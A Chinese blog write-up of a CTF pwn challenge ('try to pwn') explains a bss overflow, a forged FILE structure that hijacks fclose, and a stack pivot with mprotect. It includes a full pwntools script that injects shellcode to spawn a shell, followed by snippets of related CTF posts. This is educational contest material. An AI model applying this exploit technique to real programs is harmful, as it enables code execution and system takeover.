第一届百度杯线上初赛 - try to pwn

最新推荐文章于 2020-10-03 18:44:49 发布
最新推荐文章于 2020-10-03 18:44:49 发布
阅读量462 收藏
点赞数
分类专栏: PWN 文章标签: python 百度杯 pwn FILESteam StackPivot
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43921239/article/details/104012918
版权

第一届百度杯线上初赛 - try to pwn

题目涉及:

  • 伪造文件流(FILE Stream)
  • 调整栈帧(stack pivot)

源码分析

题目给的是一个32位静态编译的程序,保护开启情况如图:

程序的大概业务流程是打开名为输入名称+随机数文件的随机内容的文件,然后可以读取并输出这个文件的内容。

在 welcome 函数读入用户名时,没有限制输入长度,存在缓冲区溢出。

变量 x 位于 bss 段,文件指针 dword_80EFA00 也位于 bss 段,与 x 位置关系如图:

存储控制 x 输入内容,可以覆写文件指针 dword_80EFA00。程序最后调用了 fclose ,所以可以更改虚表指针来劫持控制流。

根据FILE结构,在 bss 段伪造出一个类似的结构,然后控制FILE里面的函数指针,执行任意代码。例如:执行fclose(fileexample)相当于调用 fileexample 这个文件(file)结构体虚表结构的 close 函数指针。

成功劫持文件流后,有一次调用机会(顺序执行一遍代码)。题目开启了 NX 保护,不能执行栈上 shellcode 。采取的解决办法是:先调整栈帧、扩充栈空间,使用 mprotect 函数改权限,让新的栈空间有可执行权限。

🔗Linux中mprotect()函数的用法

#include <unistd.h>
#include <sys/mmap.h>
int mprotect(const void *start, size_t len, int prot);

代码实现

mprotect 地址是用 gdb 加载程序后,print mprotect 查到。(无PIE)

from pwn import *
context.log_level = 'debug'

p = process('./fake')
#p = remote("106.75.2.53",10007)

mprotect_addr = 0x08071fd0
# ROPgadget --binary fake --only "pop|ret"
pop_esp_ret = 0x080e2b6d
# ROPgadget --binary fake --only "xchg|ret"
xchg_esp_eax_ret = 0x08048f66

payload = 'a' * 32 # fill up x
payload += p32(0x080efa00 + 4) # FILE Pointer point to fake file
payload += p32(0xffffffff) * (148 / 4) # fake file
payload += p32(0x080efa00 + 156) # fake file ending & point to gadget
payload += p32(pop_esp_ret)
payload += p32(0x080efa00 + 200) # stack pivot to enlarge 200 
payload += p32(xchg_esp_eax_ret)
fill_up = 200 - len(payload) + 32
payload += 'b' * fill_up
payload += p32(mprotect_addr) # call mprotect
payload += p32(0x080efa00 + 200 + 20) # ret to shellcode
payload += p32(0x080ef000) # argv 1
payload += p32(1024) # argv 2
payload += p32(7) # argv 3
payload += encoders.encoder.line(asm(shellcraft.sh())) # shellcode

# send name(payload)
p.recvuntil("name?")
p.sendline(payload)
# exit to run fclose
p.recvuntil(">")
p.sendline("3")

p.interactive()

SkYe231_
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
file struct 利用总结——百度总决赛线上赛try to pwn write up
jmp esp
04-08 2137
简介file stream overflow是pwn的一种常用方法(至少最近几次比赛变得有点常用了),主要是通过利用libc的FILE结构体中的一些特点达到控制流劫持的效果。一般来说劫持控制流的方式主要是: 1. 更改栈上返回地址,这种方法在堆相关的利用和格式化字符串利用时需要知道栈地址,或者有栈溢出等方法,才能够更改到栈地址 2. 更改got表地址,这种方法在开启了full relro的时候就
ichunqiu--try to pwn.md
leeham的博客
09-23 926
ichunqiu–try to pwn ICQ Baidu CTF try to pwn 好吧,这个题目其实还没有做到我想要的地步,我还想再深度挖掘一下,但是周末了,该写writeup了,就先把这部分总结写了,之后如果还想有其他的尝试,就继续做吧。 题目又不是我自己做出来的,当时没有发现程序的溢出点,于是就到网上看了别人的Write-up。和之前的感觉一样,溢出点其实很简单,关键在于ROP的构造,...
第一届百度”信息安全攻防总决赛
dfdhxb995397的博客
03-15 517
第一届百度”信息安全攻防总决赛(3月15-3月26) 比赛通道:第一届百度”信息安全攻防总决赛比赛通道 百度已经陪伴大家度过了七个月, 共计23场比赛 覆盖了i春秋30w+用户、国内全部CTF人群 共计发放奖金10w+元 也有过5次升级 现在,第一届百度即将迎来总决赛! 先让我们来回顾一下,百度是什...
第一届百度”信息安全攻防总决赛-----Upload
大方子
08-04 2033
  ================================== 个人收获: 1.某个加密方式可能使用2遍 2.后缀改为pht可绕过上传限制解析为php       ======================================   题目界面: 利用burp没有发现302跳转 但是在源码里面发现这段 就是说用post的方法发送ichunqiu...
ichunqiu-try to pwn-II.md
leeham的博客
09-27 576
FSP-stack pivot-ROP-try to pwn-II 本文参考的writeup原文 上次(这里放上次的文章链接)由于时间原因,比较仓促、敷衍的完成了一篇大致的writeup 但是其中还有很多的问题存在;这篇writeup旨在解决遇到的很多问题、疑惑;此外,还向别人请教了一些知识点,收获很大 题目相关 题目依然是ichunqiu中的try to pwn;也是2016百度-ctf的一道题...
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
Introduction-to-Pwn.pdf
09-09
pwn挑战是一种特殊类型的挑战,旨在测试参与者的技能,以bypass安全机制,exploit系统漏洞,获取系统控制权或获取flag。 pwn挑战的类型有很多,如binary exploitation challenges、web exploitation challenges、...
ciscn-2019-pwn
11-29
【标题】"ciscn-2019-pwn"是一个与网络安全竞赛相关的主题,尤其聚焦于"Pwn"类别,这通常指的是破解或利用程序漏洞来获取系统控制权的挑战。2019年的CISCN(中国互联网安全大会)可能是这个挑战的背景,它是一个汇集...
【天格】战队-未解出题目附件-第六届“强网”全国网络安全挑战赛
08-01
【天格】战队在第六届“强网”全国网络安全挑战赛中分享了多个未解出的题目附件,这些附件涵盖了网络安全领域的多个子领域,包括逆向工程、漏洞利用(PWN)、密码学(Crypto)以及杂项(Misc)。通过分析这些文件...
build-an-efficient-pwn-environment:如何在2020年建立高效的Pwn开发环境
05-26
在2020年建立高效的Pwn开发环境 多年以来,每当我决定开始学习pwn时,我发现我无法编写漏洞利用程序或无法高效地调试可执行文件。 我最终决定做些改变这种情况的事情。 所以我花了一些时间在相关工具的使用上。 ...
pwn的一些技巧与总结
weixin_30477797的博客
09-27 857
原文地址:https://github.com/Naetw/CTF-pwn-tips 目录 溢出 在gdb中寻找字符串 二进制服务 找到libc中特定函数的偏移地址 Find '/bin/sh' or 'sh' in library Leak stack address gdb中的fork问题 Secret of a mysterious section - .tls Predictable R...
i春秋上的几道pwn
sopora的博客
06-17 1727
01.pwnme-50: Tag: fmtstr任意读 / 整型溢出 / ret2csu_init #encoding:utf-8 from pwn import * #context.log_level = 'debug' def leak(addr): io.sendafter('>', '2') io.sendafter('username...
百度全国网络攻防大赛——初来乍到
sec_lee的专栏
03-12 6350
百度全国网络攻防大赛初赛采用的是国际通用的CTF模式,即capture the flag(夺旗大赛)。每队5-15人,在一定时间(一般48小时)内解决:MISC、PPC & CRYPTO、PWN、REVERSE四个安全方面的问题,问题的答案以“BCTF{flag}”的形式隐藏在某个地方,发现该模式的字符串以后,在竞赛网站提交flag就可以,注意flag是大小写敏感的。 第一题:
第一届百度”信息安全攻防总决赛 线上选拔赛 Upload
feng的博客
10-03 1107
前言 有一说一,这题应该算是比较全面,而且难度适中的一题。全是都是固定的套路,知道怎么绕过, 怎么去做,就很简单。我做的时候卡在了第一个点上。。只能说,凡是遇到写python脚本的我都没做出来过。唉。还是畏惧了。因为python很差,遇到题目自己的思路里就没有写python脚本。还是能力的问题,需要加强。 WP 首先进入环境,提示我们要做个fast man。我的第一反应是302跳转,但其实是写python脚本去post。f12看看源代码发现了:Please post the ichunqiu what yo
百度十一月第一周 PWN loading 详解
aptx4869_li的博客
06-11 1205
PWN-loading-wp0x0001用IDA查看发现只有一个关键函数:首先,了解一下 mmap 函数是干什么的:推荐一个网址:https://www.cnblogs.com/huxiao-tee/p/4660352.html
i春秋Web-Upload(第一届百度”信息安全攻防总决赛 线上选拔赛)
Sea_Sand息禅
05-15 2136
查看源码: 告诉我们要上传一个ichunqiu的参数,但是貌似并没有找所谓的find,bp抓包看到响应中有flag的响应头: 但是解码之后上传得到的还是没上传一样的情况,响应头中的flag的内容改变了,网页也告诉我们be a fast man,所以就要写脚本了: import requests import base64 url = 'http://dc587a4fbff7497...
第一届WebRTCon在上海举行
LiveVideoStack
05-19 357
&#13; &#13; &#13; &#13; &#13; &#13; &#13; 在完成1.0版定稿后,越来越多的开发者、供应商和企业级用户投入到WebRTC生态中。预计2018年全...
百度”十一月场 pwnme
baiyeguang的博客
03-14 1413
题目链接 程序分析 查看程序保护机制 开启了NX,无法修改GOT表 IDA载入分析 发现三个漏洞: 格式化字符串 这个在show功能里,参数分别是username和password 整型溢出 这里可以看到password可以输入0x12C,在下面if判断时对长度加以判断,不能超过20,但是存在类型转换截断,由于Byte是8位,当转换时超过Byte表示范围则从低位截取8位,所以这里我们输入0x...
ISC 2018 蓝鲸魔塔线上赛-pwn
Peanuts
09-06 1255
前言 这个应该是菜鸟pwn狗的成长之路吧。。这个题目比较简单就记录一下 正文 首先checksec一波           可以发现开了NX:栈不可执行,PIE:随机地址,RELRO:got表不可改写 现在还不知道应该是怎么样的思路,再ida一波。 F5一波                   这里可以看见漏洞应该就是在read这里吧,发现只溢出了...
mqtt-pwn安装
最新发布
09-20
安装mqtt-pwn的步骤如下: 1. 克隆mqtt-pwn仓库:使用命令`git clone https://github.com/akamai-threat-research/mqtt-pwn.git`将mqtt-pwn仓库克隆到本地。 2. 进入mqtt-pwn目录:使用命令`cd mqtt-pwn`进入mqtt-...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值